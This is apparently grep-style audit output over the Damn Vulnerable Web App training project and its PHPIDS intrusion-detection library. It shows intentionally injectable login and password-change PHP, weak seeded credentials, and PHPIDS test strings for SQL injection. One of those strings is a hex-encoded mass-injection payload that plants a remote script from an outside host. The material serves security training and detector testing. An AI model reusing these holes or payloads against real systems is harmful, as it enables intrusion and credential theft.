32-		}
33-
34-	}
./vulnerabilities/csrf/source/medium.php:9 (8/42) OK | Dubious | Bad | Hide
6-		if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
7-	
8-			// Turn requests into variables
9:			$pass_new = $_GET['password_new'];
10:			$pass_conf = $_GET['password_conf'];
11-
12-			if ($pass_new == $pass_conf){
13-				$pass_new = mysql_real_escape_string($pass_new);
14-				$pass_new = md5($pass_new);
15-
16:				$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
17-				$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
18-						
19-				$html .= "<pre> Password Changed </pre>";
./vulnerabilities/sqli_blind/help/help.php:16 (9/42) OK | Dubious | Bad | Hide
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./vulnerabilities/brute/index.php:45 (10/42) OK | Dubious | Bad | Hide
42-
43-		<form action=\"#\" method=\"GET\">
44-			Username:<br><input type=\"text\" name=\"username\"><br>
45:			Password:<br><input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password\"><br>
46-			<input type=\"submit\" value=\"Login\" name=\"Login\">
47-		</form>
48-
./vulnerabilities/brute/source/low.php:7 (11/42) OK | Dubious | Bad | Hide
4-
5-	$user = $_GET['username'];
6-	
7:	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
11-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
12-
13-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/low.php:19 (12/42) OK | Dubious | Bad | Hide
16-		$avatar = mysql_result( $result, $i, "avatar" );
17-
18-		// Login Successful
19:		$html .= "<p>Welcome to the password protected area " . $user . "</p>";
20-		$html .= '<img src="' . $avatar . '" />';
21-	} else {
22-		//Login failed
23:		$html .= "<pre><br>Username and/or password incorrect.</pre>";
24-	}
25-
26-	mysql_close();
./vulnerabilities/brute/source/high.php:10 (13/42) OK | Dubious | Bad | Hide
7-	$user = stripslashes( $user );
8-	$user = mysql_real_escape_string( $user );
9-
10:	// Sanitise password input
11:	$pass = $_GET[ 'password' ];
12-	$pass = stripslashes( $pass );
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
15-
16:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
17-	$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/high.php:25 (14/42) OK | Dubious | Bad | Hide
22-		$avatar = mysql_result( $result, $i, "avatar" );
23-
24-		// Login Successful
25:		$html .= "<p>Welcome to the password protected area " . $user . "</p>";
26-		$html .= '<img src="' . $avatar . '" />';
27-	} else {
28-		// Login failed
29-		sleep(3);
30:		$html .= "<pre><br>Username and/or password incorrect.</pre>";
31-		}
32-
33-	mysql_close();
./vulnerabilities/brute/source/medium.php:9 (15/42) OK | Dubious | Bad | Hide
6-	$user = $_GET[ 'username' ];
7-	$user = mysql_real_escape_string( $user );
8-
9:	// Sanitise password input
10:	$pass = $_GET[ 'password' ];
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
14:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
15-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
16-
17-	if( $result && mysql_num_rows($result) == 1 ) {
./vulnerabilities/brute/source/medium.php:23 (16/42) OK | Dubious | Bad | Hide
20-		$avatar = mysql_result( $result, $i, "avatar" );
21-
22-		// Login Successful
23:		$html .= "<p>Welcome to the password protected area " . $user . "</p>";
24-		$html .= '<img src="' . $avatar . '" />';
25-	} else {
26-		//Login failed
27:		$html .= "<pre><br>Username and/or password incorrect.</pre>";
28-	}
29-
30-	mysql_close();
./vulnerabilities/brute/help/help.php:9 (17/42) OK | Dubious | Bad | Hide
6-	<tr>
7-	<td><div id="code">
8-	
9:	<p>Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.</p>
10-
11:	<p>Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password 
12:	(usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants).</p>
13-
14:	<p>A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always
15:	be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords.</p>
16-
17-	</div></td>
18-	</tr>
./vulnerabilities/sqli/help/help.php:16 (18/42) OK | Dubious | Bad | Hide
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./external/phpids/0.6/tests/IDS/MonitorTest.php:624 (19/42) OK | Dubious | Bad | Hide
621-        $exploits[] = 'aaa\' or (1)=(1) #!asd';
622-        $exploits[] = 'aaa\' OR (1) IS NOT NULL #!asd';
623-        $exploits[] = 'a\' or 1=\'1';
624:        $exploits[] = 'asd\' union (select username,password from admins) where id=\'1';
625-        $exploits[] = "1'; WAITFOR TIME '17:48:00 ' shutdown -- -a";
626-        $exploits[] = "1'; anything: goto anything -- -a";
627-        $exploits[] = "' =+ '";
./external/phpids/0.6/tests/IDS/MonitorTest.php:715 (20/42) OK | Dubious | Bad | Hide
712-        $exploits[] = "' OR UserID > 1";
713-        $exploits[] = "'  OR UserID RLIKE  '.+' ";
714-        $exploits[] = "'OR UserID <> 2";
715:        $exploits[] = "1' union (select password from users) -- -a";
716:        $exploits[] = "1' union (select'1','2',password from users) -- -a";
717:        $exploits[] = "1' union all (select'1',password from users) -- -a";
718-        $exploits[] = "aa'!='1";
719-        $exploits[] = "aa'!=~'1";
720-        $exploits[] = "aa'=('aa')#(";
./external/phpids/0.6/tests/IDS/MonitorTest.php:895 (21/42) OK | Dubious | Bad | Hide
892-        $exploits = array();
893-
894-        $exploits[] = "asd'; shutdown; ";
895:        $exploits[] = "asd'; select null,password,null from users; ";
896-        $exploits[] = "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor ";
897-        $exploits[] = "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b
898-                        where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user
./external/phpids/0.6/tests/IDS/MonitorTest.php:906 (22/42) OK | Dubious | Bad | Hide
903-                        CLOSE tablecursor DEALLOCATE tablecursor;
904-                        and some text, to get pass the centrifuge; and some more text.";
905-        $exploits[] = "@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'";
906:        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907:        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911:        $exploits[] = "0x31 union select @@version,username,password from users ";
912-		$exploits[] = "1 order by if(1<2 ,uname,uid) ";
913-		$exploits[] = "1 order by ifnull(null,userid) ";
914-		$exploits[] = "2' between 1 and 3 or 0x61 like 'a";
./external/phpids/0.6/tests/IDS/MonitorTest.php:919 (23/42) OK | Dubious | Bad | Hide
916-		$exploits[] = "-1' /ID having 1< 1 and 1 like 1/'1 ";
917-		$exploits[] = "2' / 0x62 or 0 like binary '0";
918-		$exploits[] = "0' between 2-1 and 4-1 or 1 sounds like binary '1 ";
919:		$exploits[] = "-1' union ((select (select user),(select password),1/1 from mysql.user)) order by '1 ";
920-		$exploits[] = "-1' or substring(null/null,1/null,1) or '1";
921-		$exploits[] = "1' and 1 = hex(null-1 or 1) or 1 /'null ";		
922-
./external/phpids/0.6/lib/IDS/Caching/Database.php:213 (24/42) OK | Dubious | Bad | Hide
210-        // validate connection parameters
211-        if (!$this->config['wrapper']
212-            || !$this->config['user']
213:                || !$this->config['password']
214-                    || !$this->config['table']) {
215-
216-            throw new Exception('
./external/phpids/0.6/lib/IDS/Caching/Database.php:226 (25/42) OK | Dubious | Bad | Hide
223-            $handle = new PDO(
224-                $this->config['wrapper'],
225-                $this->config['user'],
226:                $this->config['password']
227-            );
228-
229-        } catch (PDOException $e) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/Input.php:21 (26/42) OK | Dubious | Bad | Hide
18-        if (isset($attr['checked']) && $t !== 'radio' && $t !== 'checkbox') {
19-            unset($attr['checked']);
20-        }
21:        if (isset($attr['maxlength']) && $t !== 'text' && $t !== 'password') {
22-            unset($attr['maxlength']);
23-        }
24:        if (isset($attr['size']) && $t !== 'text' && $t !== 'password') {
25-            $result = $this->pixels->validate($attr['size'], $config, $context);
26-            if ($result === false) unset($attr['size']);
27-            else $attr['size'] = $result;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Forms.php:40 (27/42) OK | Dubious | Bad | Hide
37-            'size' => 'Number',
38-            'src' => 'URI#embeds',
39-            'tabindex' => 'Number',
40:            'type' => 'Enum#text,password,checkbox,button,radio,submit,reset,file,hidden,image',
41-            'value' => 'CDATA',
42-        ));
43-        $input->attr_transform_post[] = new HTMLPurifier_AttrTransform_Input();
./external/phpids/0.6/lib/IDS/Log/Database.php:93 (28/42) OK | Dubious | Bad | Hide
90-    private $user = null;
91-
92-    /**
93:     * Database password
94-     *
95-     * @var string
96-     */
97:    private $password = null;
98-
99-    /**
100-     * Database table
./external/phpids/0.6/lib/IDS/Log/Database.php:152 (29/42) OK | Dubious | Bad | Hide
149-        if ($config instanceof IDS_Init) {
150-            $this->wrapper  = $config->config['Logging']['wrapper'];
151-            $this->user     = $config->config['Logging']['user'];
152:            $this->password = $config->config['Logging']['password'];
153-            $this->table    = $config->config['Logging']['table'];
154-
155-        } elseif (is_array($config)) {
156-            $this->wrapper  = $config['wrapper'];
157-            $this->user     = $config['user'];
158:            $this->password = $config['password'];
159-            $this->table    = $config['table'];
160-        }
161-
./external/phpids/0.6/lib/IDS/Log/Database.php:173 (30/42) OK | Dubious | Bad | Hide
170-            $this->handle = new PDO(
171-                $this->wrapper,
172-                $this->user,
173:                $this->password
174-            );
175-
176-            $this->statement = $this->handle->prepare('
./dvwa/includes/dvwaPage.inc.php:538 (31/42) OK | Dubious | Bad | Hide
535-
536-	if ($DBMS == 'MySQL') {
537-
538:		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
539-		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
540-			die( $DBMS_connError );
541-		}
./dvwa/includes/dvwaPage.inc.php:547 (32/42) OK | Dubious | Bad | Hide
544-	
545-	elseif ($DBMS == 'PGSQL') {
546-
547:		$dbconn = pg_connect("host=".$_DVWA[ 'db_server' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ])
548-		or die( $DBMS_connError );
549-
550-	}
./dvwa/includes/DBMS/PGSQL.php:10 (33/42) OK | Dubious | Bad | Hide
7-*/
8-
9-// Connect to server
10:if ( !@pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) ) {
11-	dvwaMessagePush( "Could not connect to the database - please check the config file." );
12-	dvwaPageReload();
13-}
./dvwa/includes/DBMS/PGSQL.php:34 (34/42) OK | Dubious | Bad | Hide
31-
32-
33-// Connect to server AND connect to the database
34:$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]);
35-	
36-	
37-// Create table 'users'
./dvwa/includes/DBMS/PGSQL.php:46 (35/42) OK | Dubious | Bad | Hide
43-	dvwaPageReload();
44-}
45-
46:$create_tb = "CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));";
47-
48-if( !pg_query( $create_tb ) ){
49-	dvwaMessagePush( "Table could not be created<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/PGSQL.php:61 (36/42) OK | Dubious | Bad | Hide
58-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
59-
60-$insert = "INSERT INTO users VALUES
61:	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
62-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
63-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
64-	('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'),
65:	('5','bob','smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');";
66-if( !pg_query( $insert ) ){
67-	dvwaMessagePush( "Data could not be inserted into 'users' table<br />SQL: " . pg_last_error() );
68-	dvwaPageReload();
./dvwa/includes/DBMS/DBMS.php:21 (37/42) OK | Dubious | Bad | Hide
18- }
19- 
20- function db_login( $user,$pass )  {
21:  $login = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
22-
23-	$result = @mysql_query($login) or die('<pre>' . mysql_error() . '</pre>' );
24-
./dvwa/includes/DBMS/DBMS.php:45 (38/42) OK | Dubious | Bad | Hide
42- }
43- 
44- function db_login( $user,$pass ) {
45:    $login = "SELECT * FROM users WHERE username='$user' AND password='$pass';";
46-  
47-  $result = @pg_query( $login ) or die('<pre>' . pg_last_error() . '</pre>');
48-
./dvwa/includes/DBMS/DBMS.php:77 (39/42) OK | Dubious | Bad | Hide
74-	global $DBMS_connError;
75-
76-	if ($DBMS == 'MySQL') {
77:		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
78-		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
79-			die( $DBMS_connError );
80-		}
81-	}
82-	
83-	elseif ($DBMS == 'PGSQL') {
84:		$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) 
85-		or die( $DBMS_connError );
86-	}
87-}
./dvwa/includes/DBMS/MySQL.php:9 (40/42) OK | Dubious | Bad | Hide
6-
7-*/
8-
9:if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] ) ) {
10-	dvwaMessagePush( "Could not connect to the database - please check the config file." );
11-	dvwaPageReload();
12-}
./dvwa/includes/DBMS/MySQL.php:36 (41/42) OK | Dubious | Bad | Hide
33-	dvwaPageReload();
34-}
35-
36:$create_tb = "CREATE TABLE users (user_id int(6),first_name varchar(15),last_name varchar(15), user varchar(15), password varchar(32),avatar varchar(70), PRIMARY KEY (user_id));";
37-if( !mysql_query( $create_tb ) ){
38-	dvwaMessagePush( "Table could not be created<br />SQL: ".mysql_error() );
39-	dvwaPageReload();
./dvwa/includes/DBMS/MySQL.php:52 (42/42) OK | Dubious | Bad | Hide
49-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
50-
51-$insert = "INSERT INTO users VALUES
52:	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
53-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
54-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
55-	('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'),
56:	('5','Bob','Smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');";
57-if( !mysql_query( $insert ) ){
58-	dvwaMessagePush( "Data could not be inserted into 'users' table<br />SQL: ".mysql_error() );
59-	dvwaPageReload();

host (29) Top | Hide

./index.php:25 (1/29) OK | Dubious | Bad | Hide
23-		<h2> WARNING! </h2>
24-
25:		<p>Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing ".dvwaExternalLinkUrlGet( 'http://www.apachefriends.org/en/xampp.html','XAMPP' )." onto a local machine inside your LAN which is used solely for testing.</p>
26-
27-	<h2>Disclaimer</h2>
28-
./config/config.inc.php:4 (2/29) OK | Dubious | Bad | Hide
1-<?php
2-
3-# If you are having problems connecting to the MySQL database and all of the variables below are correct
4:# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
5-# Thanks to digininja for the fix.
6-
7-# Database management system to use
./config/config.inc.php:15 (3/29) OK | Dubious | Bad | Hide
12-# Database variables
13-
14-$_DVWA = array();
15:$_DVWA[ 'db_server' ] = 'localhost';
16-$_DVWA[ 'db_database' ] = 'dvwa';
17-$_DVWA[ 'db_user' ] = 'root';
18-$_DVWA[ 'db_password' ] = '';
./external/phpids/0.6/tests/IDS/MonitorTest.php:1325 (4/29) OK | Dubious | Bad | Hide
1322-        $exploits[] = "select *something* from the menu";
1323-        $exploits[] = '<![CDATA[:??]]>';
1324-        $exploits[] = 'website_link => /app/search?op=search;keywords=peter%20testcase;';
1325:        $exploits[] = '<xjxobj><e><k>insert</k><v>insert</v></e><e><k>errorh</k><v>error</v></e><e><k>hostname</k><v>ab</v></e><e><k>ip</k><v>10.2.2.22</v></e><e><k>asset</k><v>2</v></e><e><k>thresholdc</k><v>30</v></e><e><k>thresholda</k><v>30</v></e><e><k>rrd_profile</k><v></v></e><e><k>nat</k><v></v></e><e><k>nsens</k><v>1</v></e><e><k>os</k><v>Unknown</v></e><e><k>mac</k><v></v></e><e><k>macvendor</k><v></v></e><e><k>descr</k><v><![CDATA[&]]></v></e></xjxobj>';
1326-        $exploits[] = '"hi" said the mouse to the cat and \'showed off\' her options';
1327-        $exploits[] = 'eZtwEI9v7nI1mV4Baw502qOhmGZ6WJ0ULN1ufGmwN5j+k3L6MaI0Hv4+RlOo42rC0KfrwUUm5zXOfy9Gka63m02fdsSp52nhK0Jsniw2UgeedUvn0SXfNQc/z13/6mVkcv7uVN63o5J8xzK4inQ1raknqYEwBHvBI8WGyJ0WKBMZQ26Nakm963jRb18Rzv6hz1nlf9cAOH49EMiD4vzd1g==';
1328-        $exploits[] = '"European Business School (ebs)"';
./external/phpids/0.6/lib/IDS/Caching/Memcached.php:202 (5/29) OK | Dubious | Bad | Hide
199-    private function _connect() 
200-    {
201-
202:        if ($this->config['host'] && $this->config['port']) {
203-            // establish the memcache connection
204-            $this->memcache = new Memcache;
205:            $this->memcache->pconnect($this->config['host'], 
206-                $this->config['port']);
207-            $this->path = $this->config['tmp_path'];
208-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIParser.php:58 (6/29) OK | Dubious | Bad | Hide
55-            $matches = array();
56-            preg_match($r_authority, $authority, $matches);
57-            $userinfo   = !empty($matches[1]) ? $matches[2] : null;
58:            $host       = !empty($matches[3]) ? $matches[3] : '';
59-            $port       = !empty($matches[4]) ? (int) $matches[5] : null;
60-        } else {
61:            $port = $host = $userinfo = null;
62-        }
63-        
64-        return new HTMLPurifier_URI(
65:            $scheme, $userinfo, $host, $port, $path, $query, $fragment);
66-    }
67-    
68-}
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIDefinition.php:17 (7/29) OK | Dubious | Bad | Hide
14-    public $base;
15-    
16-    /**
17:     * String host to consider "home" base, derived off of $base
18-     */
19:    public $host;
20-    
21-    /**
22-     * Name of default scheme based on %URI.DefaultScheme and %URI.Base
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIDefinition.php:64 (8/29) OK | Dubious | Bad | Hide
61-    }
62-    
63-    protected function setupMemberVariables($config) {
64:        $this->host = $config->get('URI', 'Host');
65-        $base_uri = $config->get('URI', 'Base');
66-        if (!is_null($base_uri)) {
67-            $parser = new HTMLPurifier_URIParser();
68-            $this->base = $parser->parse($base_uri);
69-            $this->defaultScheme = $this->base->scheme;
70:            if (is_null($this->host)) $this->host = $this->base->host;
71-        }
72-        if (is_null($this->defaultScheme)) $this->defaultScheme = $config->get('URI', 'DefaultScheme');
73-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/Host.php:4 (9/29) OK | Dubious | Bad | Hide
1-<?php
2-
3-/**
4: * Validates a host according to the IPv4, IPv6 and DNS (future) specifications.
5- */
6-class HTMLPurifier_AttrDef_URI_Host extends HTMLPurifier_AttrDef
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/Host.php:53 (10/29) OK | Dubious | Bad | Hide
50-        $domainlabel   = "$an($and*$an)?";
51-        // toplabel    = alpha | alpha *( alphanum | "-" ) alphanum
52-        $toplabel      = "$a($and*$an)?";
53:        // hostname    = *( domainlabel "." ) toplabel [ "." ]
54-        $match = preg_match("/^($domainlabel\.)*$toplabel\.?$/i", $string);
55-        if (!$match) return false;
56-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:14 (11/29) OK | Dubious | Bad | Hide
11-class HTMLPurifier_URI
12-{
13-    
14:    public $scheme, $userinfo, $host, $port, $path, $query, $fragment;
15-    
16-    /**
17-     * @note Automatically normalizes scheme and port
18-     */
19:    public function __construct($scheme, $userinfo, $host, $port, $path, $query, $fragment) {
20-        $this->scheme = is_null($scheme) || ctype_lower($scheme) ? $scheme : strtolower($scheme);
21-        $this->userinfo = $userinfo;
22:        $this->host = $host;
23-        $this->port = is_null($port) ? $port : (int) $port;
24-        $this->path = $path;
25-        $this->query = $query;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:71 (12/29) OK | Dubious | Bad | Hide
68-        $chars_pchar = $chars_sub_delims . ':@';
69-        
70-        // validate scheme (MUST BE FIRST!)
71:        if (!is_null($this->scheme) && is_null($this->host)) {
72-            $def = $config->getDefinition('URI');
73-            if ($def->defaultScheme === $this->scheme) {
74-                $this->scheme = null;
75-            }
76-        }
77-        
78:        // validate host
79:        if (!is_null($this->host)) {
80:            $host_def = new HTMLPurifier_AttrDef_URI_Host();
81:            $this->host = $host_def->validate($this->host, $config, $context);
82:            if ($this->host === false) $this->host = null;
83-        }
84-        
85-        // validate username
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:99 (13/29) OK | Dubious | Bad | Hide
96-        // validate path
97-        $path_parts = array();
98-        $segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/');
99:        if (!is_null($this->host)) {
100-            // path-abempty (hier and relative)
101-            $this->path = $segments_encoder->encode($this->path);
102-        } elseif ($this->path !== '' && $this->path[0] === '/') {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:153 (14/29) OK | Dubious | Bad | Hide
150-    public function toString() {
151-        // reconstruct authority
152-        $authority = null;
153:        if (!is_null($this->host)) {
154-            $authority = '';
155-            if(!is_null($this->userinfo)) $authority .= $this->userinfo . '@';
156:            $authority .= $this->host;
157-            if(!is_null($this->port))     $authority .= ':' . $this->port;
158-        }
159-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/HostBlacklist.php:12 (15/29) OK | Dubious | Bad | Hide
9-        return true;
10-    }
11-    public function filter(&$uri, $config, $context) {
12:        foreach($this->blacklist as $blacklisted_host_fragment) {
13:            if (strpos($uri->host, $blacklisted_host_fragment) !== false) {
14-                return false;
15-            }
16-        }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:28 (16/29) OK | Dubious | Bad | Hide
25-        if (is_null($this->base)) return true; // abort early
26-        if (
27-            $uri->path === '' && is_null($uri->scheme) &&
28:            is_null($uri->host) && is_null($uri->query) && is_null($uri->fragment)
29-        ) {
30-            // reference to current document
31-            $uri = clone $this->base;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:36 (17/29) OK | Dubious | Bad | Hide
33-        }
34-        if (!is_null($uri->scheme)) {
35-            // absolute URI already: don't change
36:            if (!is_null($uri->host)) return true;
37-            $scheme_obj = $uri->getSchemeObj($config, $context);
38-            if (!$scheme_obj) {
39-                // scheme not recognized
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:48 (18/29) OK | Dubious | Bad | Hide
45-            }
46-            // special case: had a scheme but always is hierarchical and had no authority
47-        }
48:        if (!is_null($uri->host)) {
49-            // network path, don't bother
50-            return true;
51-        }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:58 (19/29) OK | Dubious | Bad | Hide
55-            // relative path, needs more complicated processing
56-            $stack = explode('/', $uri->path);
57-            $new_stack = array_merge($this->basePathStack, $stack);
58:            if ($new_stack[0] !== '' && !is_null($this->base->host)) {
59-                array_unshift($new_stack, '');
60-            }
61-            $new_stack = $this->_collapseStack($new_stack);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:70 (20/29) OK | Dubious | Bad | Hide
67-        // re-combine
68-        $uri->scheme = $this->base->scheme;
69-        if (is_null($uri->userinfo)) $uri->userinfo = $this->base->userinfo;
70:        if (is_null($uri->host))     $uri->host     = $this->base->host;
71-        if (is_null($uri->port))     $uri->port     = $this->base->port;
72-        return true;
73-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/Munge.php:23 (21/29) OK | Dubious | Bad | Hide
20-        
21-        $scheme_obj = $uri->getSchemeObj($config, $context);
22-        if (!$scheme_obj) return true; // ignore unknown schemes, maybe another postfilter did it
23:        if (is_null($uri->host) || empty($scheme_obj->browsable)) {
24-            return true;
25-        }
26-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/Munge.php:32 (22/29) OK | Dubious | Bad | Hide
29-        
30-        $new_uri = strtr($this->target, $this->replace);
31-        $new_uri = $this->parser->parse($new_uri);
32:        // don't redirect if the target host is the same as the 
33:        // starting host
34:        if ($uri->host === $new_uri->host) return true;
35-        $uri = $new_uri; // overwrite
36-        return true;
37-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/DisableExternal.php:8 (23/29) OK | Dubious | Bad | Hide
5-    public $name = 'DisableExternal';
6-    protected $ourHostParts = false;
7-    public function prepare($config) {
8:        $our_host = $config->getDefinition('URI')->host;
9:        if ($our_host !== null) $this->ourHostParts = array_reverse(explode('.', $our_host));
10-    }
11-    public function filter(&$uri, $config, $context) {
12:        if (is_null($uri->host)) return true;
13-        if ($this->ourHostParts === false) return false;
14:        $host_parts = array_reverse(explode('.', $uri->host));
15-        foreach ($this->ourHostParts as $i => $x) {
16:            if (!isset($host_parts[$i])) return false;
17:            if ($host_parts[$i] != $this->ourHostParts[$i]) return false;
18-        }
19-        return true;
20-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme/mailto.php:19 (24/29) OK | Dubious | Bad | Hide
16-    public function validate(&$uri, $config, $context) {
17-        parent::validate($uri, $config, $context);
18-        $uri->userinfo = null;
19:        $uri->host     = null;
20-        $uri->port     = null;
21-        // we need to validate path against RFC 2368's addr-spec
22-        return true;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme/news.php:13 (25/29) OK | Dubious | Bad | Hide
10-    public function validate(&$uri, $config, $context) {
11-        parent::validate($uri, $config, $context);
12-        $uri->userinfo = null;
13:        $uri->host     = null;
14-        $uri->port     = null;
15-        $uri->query    = null;
16-        // typecode check needed on path
